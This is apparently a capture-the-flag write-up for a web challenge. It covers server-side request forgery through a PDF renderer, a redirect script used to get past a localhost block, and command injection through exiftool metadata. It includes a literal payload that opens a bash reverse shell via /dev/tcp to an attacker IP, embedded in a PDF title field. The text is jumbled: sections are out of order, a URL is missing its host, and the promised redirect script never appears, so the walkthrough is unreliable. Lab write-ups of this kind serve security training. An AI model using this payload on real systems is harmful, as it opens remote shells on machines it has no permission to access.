The client-side script submits the URL to /api/cache, resulting in a JSON response with a filename in /static/pdfs/.

Phase 2: Identifying the Backend Vector
To execute this attack, our local server needs to be accessible from the internet. ngrok is the perfect tool for this.
If you attempt to pass http://127.0.0.1 or http://localhost, the application throws an error or triggers a generic validation block. This implies there is a basic blacklist or sanitization filter preventing the engine from calling internal network services directly.
Create a simple PHP script named redirect.php on your attack machine. This script will force any visiting client to redirect to a local file or service on the target machine:
Pdf
Difficulty: Easy to Medium
OS: Linux
Key Skills: File Upload Exploitation, Server-Side Request Forgery (SSRF), Command Injection.
Tags: Web, PDF, Exiftool, Python.
exiftool -Title='test; bash -c "bash -i >& /dev/tcp/10.10.14.xx/4444 0>&1";' shell.pdf
Now, go back to the PDFy web interface and enter your IP: http:// :8000/exploit.php
The first step in any penetration test is to perform an initial scan of the target machine to identify open ports and services. Using Nmap, I ran a basic scan:
If you are running this locally, you must expose your server to the internet so the HTB challenge instance can reach it. Using a Reverse Proxy or tools like Serveo is recommended over ngrok for this specific challenge to avoid browser warning screens that might break the automated PDF rendering.